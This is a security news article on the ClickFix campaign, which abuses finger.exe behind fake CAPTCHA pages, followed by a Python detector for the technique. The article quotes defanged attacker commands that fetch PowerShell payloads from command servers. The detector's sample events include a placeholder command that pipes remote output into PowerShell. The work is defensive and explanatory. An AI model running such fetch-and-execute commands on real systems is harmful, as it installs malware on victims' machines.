
A novel social engineering campaign, dubbed ClickFix, has been identified, which cleverly employs an old Windows command-line tool, finger.exe, to install malware on victims’ systems.
This attack begins with a deceptive CAPTCHA verification page, tricking users into running a script that initiates the infection process.
The technique has been in use since at least November 2025 and continues to be a persistent threat.
The attack’s reliance on the finger protocol, a legacy networking tool for retrieving user information, is a unique characteristic.
Threat actors are abusing this seemingly harmless utility to fetch malicious payloads from remote servers.
This method allows the attackers to bypass some security measures that are not configured to monitor or block traffic over the finger protocol’s designated TCP port 79.
Internet Storm Center researchers noted this activity and have been tracking two prominent campaigns employing this technique: KongTuke and SmartApeSG.
Fake CAPTCHA pages
Both campaigns leverage fake CAPTCHA pages to lure users into executing the initial finger command, demonstrating a shared methodology.
The continued use of this tactic highlights its effectiveness in environments where legacy protocols are not adequately secured.
Upon execution, the finger command contacts a command-and-control server. For instance, the KongTuke campaign uses a command like finger gcaptcha@captchaver[.]top.
The server responds with a PowerShell command containing Base64 encoded text, which then executes on the user’s machine to carry out further malicious activities.
The SmartApeSG campaign operates similarly, using a command such as finger [email protected][.]108 to retrieve a script.
This script then downloads and executes a malicious file; the captured script retrieves a file named yhb.jpg that contains the malicious payload.
This multi-stage process allows the malware to establish a foothold on the compromised system.
While corporate networks with explicit proxies may block TCP port 79, many systems remain vulnerable if this port is not explicitly blocked, making these attacks a continued concern for network administrators.
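As an added example (not code from the article or from the Internet Storm Center researchers), the following Python detector flags the two observable features of this chain: finger.exe launched with a user@host argument, especially when its output is piped into a shell, and any outbound connection to TCP port 79. The sample events, hostnames and IP addresses are constructed placeholders, not indicators from the campaigns.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real logs): process-creation and
# network-connection records shaped like the finger-based ClickFix chain
# described above. Hostnames and IPs are placeholders.
SAMPLE_EVENTS = [
    {"type": "process", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c finger gcaptcha@captcha-placeholder.example | powershell -"},
    {"type": "process", "image": r"C:\Windows\System32\finger.exe",
     "cmdline": "finger gcaptcha@captcha-placeholder.example"},
    {"type": "network", "image": r"C:\Windows\System32\finger.exe",
     "dst_port": 79, "dst_ip": "203.0.113.10"},
    {"type": "process", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},
    {"type": "network", "image": r"C:\Program Files\Browser\browser.exe",
     "dst_port": 443, "dst_ip": "203.0.113.20"},
]

# finger (or finger.exe) followed by a user@host query argument
FINGER_CMD = re.compile(r"(?:^|[\s\"'])finger(?:\.exe)?\s+\S+@\S+", re.IGNORECASE)
# finger output piped straight into an interpreter, as in the observed chain
PIPE_TO_SHELL = re.compile(r"\|\s*(?:powershell|pwsh|cmd)\b", re.IGNORECASE)


def classify(event: Dict) -> List[str]:
    """Return detection labels for one event; an empty list means nothing matched."""
    labels: List[str] = []
    if event["type"] == "process":
        cmd = event.get("cmdline", "")
        if FINGER_CMD.search(cmd):
            labels.append("finger_remote_query")
            if PIPE_TO_SHELL.search(cmd):
                labels.append("finger_output_piped_to_shell")
    elif event["type"] == "network":
        # Port 79 is the finger protocol's designated port; it should be rare
        # on a modern network regardless of which process opened it.
        if event.get("dst_port") == 79:
            labels.append("outbound_tcp_79")
            if event.get("image", "").lower().endswith("finger.exe"):
                labels.append("finger_exe_network")
    return labels


def scan(events: List[Dict]) -> List[Tuple[int, List[str]]]:
    """Return (index, labels) for every event that produced at least one label."""
    hits = []
    for i, event in enumerate(events):
        labels = classify(event)
        if labels:
            hits.append((i, labels))
    return hits
```

Blocking TCP port 79 at the proxy or egress firewall, as the article notes, removes the transport entirely; the process-level rule above still catches the attempt on hosts that can reach the port.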
